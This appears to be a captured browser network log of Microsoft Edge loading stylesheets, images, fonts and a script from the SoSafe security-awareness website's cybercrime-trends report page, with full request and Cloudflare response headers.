alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/parts/events.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/parts/events.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c67f947785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 521131
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-442e"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=17454
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,c9af784aa07614f41551d044f7a0a567c7f176e43511c973de777c1451051825
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mR0abab9ygYgRNRYVezIylF3sWCSR%2B38B3btYL%2Bdu9PkX7sAU9zVPzhfrKluspyvrNxitWlfAqYfi8qe7nBmGQKbMuOVlhRp%2FNZ%2FwoGMTbGlOsX%2FwNPgxj50CcFAsEA2j%2FUhkXld"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/parts/resources.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/parts/resources.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c67f9d7785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 521131
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-b90"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,cda7084301511ce2bb1e3ea2478db4bcb80459e10e9035e264e86c5c0b6a208e
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CfPfM9mxv5KiGpu6J2ux9NtgJcnG3suzIkUjYt9FvTA2e2jlYvNoojPJO%2B1EZHrbiDZMRC%2FDgRft9I50zctGLQjZAu0HGkrf4RrvC7TGey8OFCi4ZR18WPD2JEYejhTRM0HitUcz"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/data-cards.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/blocks/data-cards.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c67f9b7785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 521131
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-b1e"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,b3296c86331925e195a79a0838d847abea65579482f7785fa2b5908bfc198f99
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mshd5RgKkFvcQaYPfFhy2WLPjmx0UpPAzrFNj6OceSNqBo2I3E%2BHhGv2WNsC53%2BvFbbiNjIPM%2F46YnSvkJD%2BDPwxo3wGrapyrLZuPcfPXomli4qhY2r62acD1Tc64v3foQwrExZb"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/ipad-content.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/blocks/ipad-content.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c67f9f7785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 517918
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-d1e"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=3358
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,ff94d4c599705548313b549cc1910856b5f0b17736068b06cad2d6767f96c970
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kF30lw%2FjeK8YJw1gzlfyEAAbGT0R0inHuYnxMfN%2BStwMsqrkaBqvLD09hxGo7u4MQs4Z%2Fl13a9LIC6awgdPFYkkT6Smp74zNcmq1geqOxzG2s9jyY8uImyxYOCfXfJdFJYqEON9%2F"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/interviews-grid.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/blocks/interviews-grid.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c67f987785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 59502
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-76b"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=1899
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,6750abf7cd61682c2e2dd2395f05f988d7d72a0f9de65c778b4df440977bfb43
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FekhlUOtf7HpwXBfexi5r7QRhoWqdjN8GFII4LdTlmUv5T4uyiCNdI%2Ft%2F3ONhx1NTA50%2FZnh739qMgSVX%2FPhSYs3KoTqI16q3%2B1dp36yIodVMj5mUG7DPE9MmHpRKSlt2exk%2FQrx"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/themes/sosafe/css/blocks/form-revamped.css?ver=1.5.95msedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/css/blocks/form-revamped.css?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/jpeg
content-length: 89815
cf-ray: 85d1f5c748bf7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 943437
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-1719c"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: origSize=94620
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,66f5d8119e817cf49a435e194807d2c307db3c0f42e79e852b24122a8c4dcd4b
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dInXFkoP%2BOQurqfRB2oJfA5JYbcgv7QhsQZda%2BJnWrtdr%2FzorNgiFsi%2BMQSEIQrFM7N1DTPyJkuhSd7Wg%2Ffk%2FIYRX0P3n45lvWo%2F%2FkH72IkBYkbfUbXBIJutiX8UahcM4cQNTfHn"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_Website_Header_Image_light.pngmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_Website_Header_Image_light.png HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: image/png
content-length: 212241
cf-ray: 85d1f5c748be7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 452620
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb73f4-33d11"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:51:48 GMT
vary: Accept-Encoding
cf-bgj: imgq:100,h2pri
cf-polished: status=not_needed
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,56d5c6ab8f19a59ab59fc1078156a19dc475298ef1b20618ba1685cf94cb04db
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=toxuqSOwvUWjwqET%2BJTtVzoL1Vt9aKfhj2Y4TWuMc1gPP6u3TlId%2F3W%2FtOa0%2FcY1lxThb5ois4LAtyC%2BhA0Y%2BjP7ajtZ8si46tdIABo%2FTjcWvJXPg8gy4xvZYGrBcJ%2BngDrNF1kN"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafe-awareness.com/sosafe-files/uploads/2024/02/CCT24_Website_Header_BG_light-scaled.jpgmsedge.exeRemote address:162.159.135.42:443RequestGET /sosafe-files/uploads/2024/02/CCT24_Website_Header_BG_light-scaled.jpg HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css; charset=UTF-8
cf-ray: 85d1f5c748bd7785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 521131
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-f61"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=3937
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,d0431b2ceaa6700b0caad66e2f791882f4bf0126c845621ce29d3087a3daf594
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YGRxJ8%2ByioUfWsvqxsYSTlhqfVIWphrtBlRDaG4n6rhuN6l2%2BJECXhqo0Ur4GihJOAewPul12hRjwToAXOXa5s%2BxQTQMk1ykuF7lJxbZbxgyLsPlA4goejtzEIEn3Zc95DG%2Bdh1c"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/scss/fonts/manrope-700.woff2 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://sosafe-awareness.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
content-length: 24280
cf-ray: 85d1f5c7a9337785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 1120136
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb744b-5ed8"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:53:15 GMT
vary: Accept-Encoding
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,ca0beb6fc2e0fc300fcb2924849a3add8b531fbfc34da011c2c7af609bdbd06d
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vz%2BPWSeultE4mJFYdbLeIGUOrJpw6SRcEWlAT%2BQnoSsXfw7hZOHE%2FtYoG5Pgu3DhsZDArUE3aMu6wXqjLfawXcxArYpOMtrnpK6Nku7ZVw4N%2FSps3ZUYDNIgQaTQumyRO2VihD%2Bk"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/scss/fonts/manrope-600.woff2 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://sosafe-awareness.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
content-length: 24280
cf-ray: 85d1f5c7a92e7785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 1053536
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb744b-5ed8"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:53:15 GMT
vary: Accept-Encoding
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,f3edb11051c4403cea85212ad0c45626e867a636071d35a62ee5d99b6df674f4
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TG%2FCy8IoFeNf65T3njj9RFDav2UVBCTsJ%2BM9vBy3aMAtEr1611Y1sM1FALPtNikN4KC0lS9B0KKnZJt4kJ8k641%2FHj3ZiEEkNMeulHbGn%2Fbdb6lHqFGlW0hQb1jxs6%2BlP62lMujs"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/scss/fonts/manrope-400.woff2 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://sosafe-awareness.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: font/woff2
content-length: 24280
cf-ray: 85d1f5c7a9317785-LHR
cf-cache-status: HIT
accept-ranges: bytes
access-control-allow-origin: *
age: 1120136
cache-control: public, max-age=31536000, s-maxage=2592000
etag: "65cb744b-5ed8"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Tue, 13 Feb 2024 13:53:15 GMT
vary: Accept-Encoding
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,8b30283c96d0dd459e535b21138f126f495c5fc7094aaaca8419e90769e2c916
ki-cache-type: CDN
ki-cf-cache-status: HIT
ki-edge: v=20.2.7;mv=3.0.4
ki-origin: g1p
x-content-type-options: nosniff
x-edge-location-klb: 1
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zGFPAotiGEqjBtsPUhZcXKW%2BDMCecsA5YkqRhmuq2YNQCXU4gXatuXgB1J%2FBykwmMFZ%2BjoamxtHU9aWlxbp4K4JhNzWFqk23OAQ100eMLRlZW3AAf87%2B8%2BTabI%2Fz0nwvMAabtTMt"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:162.159.135.42:443RequestGET /sosafe-files/themes/sosafe/js/navigation.js?ver=1.5.95 HTTP/2.0
host: sosafe-awareness.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=UTF-8
cf-ray: 85d1f5c849e27785-LHR
cf-cache-status: HIT
access-control-allow-origin: *
age: 522052
cache-control: public, max-age=31536000, s-maxage=2592000
etag: W/"65d8ab45-ba4"
expires: Thu, 31 Dec 2037 23:55:55 GMT
last-modified: Fri, 23 Feb 2024 14:27:17 GMT
vary: Accept-Encoding
cf-bgj: minify
cf-polished: origSize=2980
ki-cache-tag: 04186fa4-6fa8-4f68-9d8a-1552c5e2d827,3dc9584279be29650223a90c4c5cbfbbdacf53580256820fa714a279f7895bce
